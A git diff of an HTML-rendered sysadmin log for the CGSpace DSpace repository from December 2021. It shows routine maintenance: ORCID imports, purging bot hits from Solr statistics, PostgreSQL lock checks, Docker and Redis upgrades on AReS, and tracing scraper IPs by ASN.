&#34;Mutenje, Munyaradzi&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
&#34;Rex, William&#34;,&#34;William Rex: 0000-0003-4979-5257&#34;
&#34;Shrestha, Shisher&#34;,&#34;Nirman Shrestha: 0000-0002-0996-8611&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Liaqat, U.W.&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
</span></span><span style="display:flex;"><span>&#34;Liaqat, Umar Waqas&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
</span></span><span style="display:flex;"><span>&#34;Munyaradzi, M.&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
</span></span><span style="display:flex;"><span>&#34;Mutenje, Munyaradzi&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
</span></span><span style="display:flex;"><span>&#34;Rex, William&#34;,&#34;William Rex: 0000-0003-4979-5257&#34;
</span></span><span style="display:flex;"><span>&#34;Shrestha, Shisher&#34;,&#34;Nirman Shrestha: 0000-0002-0996-8611&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><!-- raw HTML omitted -->

View File

@ -40,7 +40,7 @@ Purging 455 hits from WhatsApp in statistics
Total number of bot hits purged: 3679
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -131,13 +131,13 @@ Total number of bot hits purged: 3679
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div><h2 id="2021-12-02">2021-12-02</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div><h2 id="2021-12-02">2021-12-02</h2>
<ul>
<li>Francesca from Alliance asked me for help with approving a submission that gets stuck
<ul>
@ -145,23 +145,23 @@ Purging 455 hits from WhatsApp in statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (1437 rows)
1 application_name
9 psql
1428 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (1437 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 1428 dspaceWeb
</span></span></code></pre></div><ul>
<li>Munin shows the same:</li>
</ul>
<p><img src="/cgspace-notes/2021/12/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
<ul>
<li>Last month I enabled the <code>log_lock_waits</code> in PostgreSQL so I checked the log and was surprised to find only a few since I restarted PostgreSQL three days ago:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -E <span style="color:#e6db74">&#39;^2021-(11-29|11-30|12-01|12-02)&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
15
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;^2021-(11-29|11-30|12-01|12-02)&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>15
</span></span></code></pre></div><ul>
<li>I think you could analyze the locks for the <code>dspaceWeb</code> user (XMLUI) and find out what queries were locking&hellip; but it&rsquo;s so much information and I don&rsquo;t know where to start
<ul>
<li>For now I just restarted PostgreSQL&hellip;</li>
@ -250,9 +250,9 @@ Purging 455 hits from WhatsApp in statistics
</li>
<li>I noticed a strange user agent in the XMLUI logs on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] &#34;GET /handle/10568/33203 HTTP/1.1&#34; 200 6328 &#34;-&#34; &#34;python-requests/2.25.1&#34;
20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] &#34;GET /handle/10568/33203 HTTP/2.0&#34; 200 6315 &#34;-&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] &#34;GET /handle/10568/33203 HTTP/1.1&#34; 200 6328 &#34;-&#34; &#34;python-requests/2.25.1&#34;
</span></span><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] &#34;GET /handle/10568/33203 HTTP/2.0&#34; 200 6315 &#34;-&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36&#34;
</span></span></code></pre></div><ul>
<li>I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
<ul>
<li>It could be someone on Azure?</li>
@ -261,11 +261,11 @@ Purging 455 hits from WhatsApp in statistics
</li>
<li>I purged 34,000 hits from this user agent in our Solr statistics:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 34458 hits from HeadlessChrome in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 34458
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 34458 hits from HeadlessChrome in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 34458
</span></span></code></pre></div><ul>
<li>Meeting with partners about repositories in the One CGIAR</li>
</ul>
<h2 id="2021-12-08">2021-12-08</h2>
@ -307,26 +307,26 @@ Purging 34458 hits from HeadlessChrome in statistics
<ul>
<li>I finally caught some stuck locks on CGSpace after checking several times per day for the last week:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
1508
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1508
</span></span></code></pre></div><ul>
<li>Now looking at the locks query sorting by age of locks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat locks-age.sql
SELECT a.datname,
l.relation::regclass,
l.transactionid,
l.mode,
l.GRANTED,
a.usename,
a.query,
a.query_start,
age(now(), a.query_start) AS &#34;age&#34;,
a.pid
FROM pg_stat_activity a
JOIN pg_locks l ON l.pid = a.pid
ORDER BY a.query_start;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat locks-age.sql
</span></span><span style="display:flex;"><span>SELECT a.datname,
</span></span><span style="display:flex;"><span> l.relation::regclass,
</span></span><span style="display:flex;"><span> l.transactionid,
</span></span><span style="display:flex;"><span> l.mode,
</span></span><span style="display:flex;"><span> l.GRANTED,
</span></span><span style="display:flex;"><span> a.usename,
</span></span><span style="display:flex;"><span> a.query,
</span></span><span style="display:flex;"><span> a.query_start,
</span></span><span style="display:flex;"><span> age(now(), a.query_start) AS &#34;age&#34;,
</span></span><span style="display:flex;"><span> a.pid
</span></span><span style="display:flex;"><span>FROM pg_stat_activity a
</span></span><span style="display:flex;"><span>JOIN pg_locks l ON l.pid = a.pid
</span></span><span style="display:flex;"><span>ORDER BY a.query_start;
</span></span></code></pre></div><ul>
<li>The oldest locks are 9 hours and 26 minutes old and the time on the server is <code>Tue Dec 14 18:41:58 CET 2021</code>, so it seems something happened around 9:15 this morning
<ul>
<li>I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)</li>
@ -354,25 +354,25 @@ ORDER BY a.query_start;
</li>
<li>I created a SAF archive with SAFBuilder and then imported it to DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2021-12-16-green-covers.map
</code></pre></div><h2 id="2021-12-19">2021-12-19</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2021-12-16-green-covers.map
</span></span></code></pre></div><h2 id="2021-12-19">2021-12-19</h2>
<ul>
<li>I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&gt; openrxv-backend@0.0.1 build
&gt; nest build
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
</span></span><span style="display:flex;"><span>&gt; nest build
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</span></span></code></pre></div><ul>
<li>I&rsquo;m not sure why because I build the backend successfully on my local machine&hellip;
<ul>
<li>For now I just ran all the system updates and rebooted the machine (linode20)</li>
@ -389,39 +389,39 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</li>
<li>But since software sucks, now I get an error in the frontend while starting nginx:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">nginx: [emerg] host not found in upstream &#34;backend:3000&#34; in /etc/nginx/conf.d/default.conf:2
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nginx: [emerg] host not found in upstream &#34;backend:3000&#34; in /etc/nginx/conf.d/default.conf:2
</span></span></code></pre></div><ul>
<li>In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I&rsquo;m happy to see that the <a href="https://raw.githubusercontent.com/redis/redis/6.0/00-RELEASENOTES">release notes for version 6</a> say that it is compatible with 5 except for one minor thing that we don&rsquo;t seem to be using (SPOP?)</li>
<li>For reference I see that our Redis 5 container is based on Debian 11, which I didn&rsquo;t expect&hellip; but I still want to try to upgrade to Redis 6 eventually:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker exec -it redis bash
root@23692d6b51c5:/data# cat /etc/os-release
PRETTY_NAME=&#34;Debian GNU/Linux 11 (bullseye)&#34;
NAME=&#34;Debian GNU/Linux&#34;
VERSION_ID=&#34;11&#34;
VERSION=&#34;11 (bullseye)&#34;
VERSION_CODENAME=bullseye
ID=debian
HOME_URL=&#34;https://www.debian.org/&#34;
SUPPORT_URL=&#34;https://www.debian.org/support&#34;
BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it redis bash
</span></span><span style="display:flex;"><span>root@23692d6b51c5:/data# cat /etc/os-release
</span></span><span style="display:flex;"><span>PRETTY_NAME=&#34;Debian GNU/Linux 11 (bullseye)&#34;
</span></span><span style="display:flex;"><span>NAME=&#34;Debian GNU/Linux&#34;
</span></span><span style="display:flex;"><span>VERSION_ID=&#34;11&#34;
</span></span><span style="display:flex;"><span>VERSION=&#34;11 (bullseye)&#34;
</span></span><span style="display:flex;"><span>VERSION_CODENAME=bullseye
</span></span><span style="display:flex;"><span>ID=debian
</span></span><span style="display:flex;"><span>HOME_URL=&#34;https://www.debian.org/&#34;
</span></span><span style="display:flex;"><span>SUPPORT_URL=&#34;https://www.debian.org/support&#34;
</span></span><span style="display:flex;"><span>BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</span></span></code></pre></div><ul>
<li>I bumped the version to 6 on my local test machine and the logs look good:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker logs redis
1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
1:M 19 Dec 2021 19:27:15.584 # Server initialized
1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs redis
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 # Server initialized
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
</span></span></code></pre></div><ul>
<li>The interface and harvesting all work as expected&hellip;
<ul>
<li>I pushed the update to OpenRXV</li>
@ -443,8 +443,8 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
<li>Move invalid AGROVOC subjects in Gaia&rsquo;s eighteen green cover items on DSpace Test to <code>cg.subject.system</code></li>
<li>I created an &ldquo;approve&rdquo; user for Rafael from CIAT to do tests on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuuuu&#39;</span>
</code></pre></div><h2 id="2021-12-27">2021-12-27</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-12-27">2021-12-27</h2>
<ul>
<li>Start a fresh harvest on AReS</li>
</ul>
@ -452,8 +452,8 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
<ul>
<li>Looking at the top IPs and user agents on CGSpace&rsquo;s Solr statistics I see a strange user agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
</span></span></code></pre></div><ul>
<li>I found two IPs using user agents with the &ldquo;randint&rdquo; bug:
<ul>
<li>47.252.80.214 (AliCloud in the US)</li>
@ -469,26 +469,26 @@ BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
</li>
<li>3.225.28.105 is on Amazon and making thousands of requests for the same URL:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">/rest/collections/1118/items?expand=all&amp;limit=1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>/rest/collections/1118/items?expand=all&amp;limit=1
</span></span></code></pre></div><ul>
<li>Most of the time it has a real-looking user agent, but sometimes it uses <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
<li>Another 82.65.26.228 is doing SQL injection attempts from France</li>
<li>216.213.28.138 is some scrape-as-a-service bot from Sprious</li>
<li>I used my <code>resolve-addresses-geoip2.py</code> script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span>
2 10620
2 265696
2 6147
2 9299
3 3269
5 16509
5 49505
9 24757
9 24940
9 64267
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
</span></span><span style="display:flex;"><span>$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span>
</span></span><span style="display:flex;"><span> 2 10620
</span></span><span style="display:flex;"><span> 2 265696
</span></span><span style="display:flex;"><span> 2 6147
</span></span><span style="display:flex;"><span> 2 9299
</span></span><span style="display:flex;"><span> 3 3269
</span></span><span style="display:flex;"><span> 5 16509
</span></span><span style="display:flex;"><span> 5 49505
</span></span><span style="display:flex;"><span> 9 24757
</span></span><span style="display:flex;"><span> 9 24940
</span></span><span style="display:flex;"><span> 9 64267
</span></span></code></pre></div><ul>
<li>AS 64267 is Sprious, and it has used these IPs this month:
<ul>
<li>216.213.28.136</li>
@ -526,37 +526,37 @@ $ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | aw
</li>
<li>I ran the script to purge spider agents with the latest updates:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 2530 hits from HeadlessChrome in statistics
Purging 10676 hits from randint in statistics
Purging 3579 hits from Koha in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 16785
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 2530 hits from HeadlessChrome in statistics
</span></span><span style="display:flex;"><span>Purging 10676 hits from randint in statistics
</span></span><span style="display:flex;"><span>Purging 3579 hits from Koha in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 16785
</span></span></code></pre></div><ul>
<li>Then the IPs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
Purging 1190 hits from 216.213.28.136 in statistics
Purging 1128 hits from 207.182.27.191 in statistics
Purging 1095 hits from 216.41.235.187 in statistics
Purging 1087 hits from 216.41.232.169 in statistics
Purging 1011 hits from 216.41.235.186 in statistics
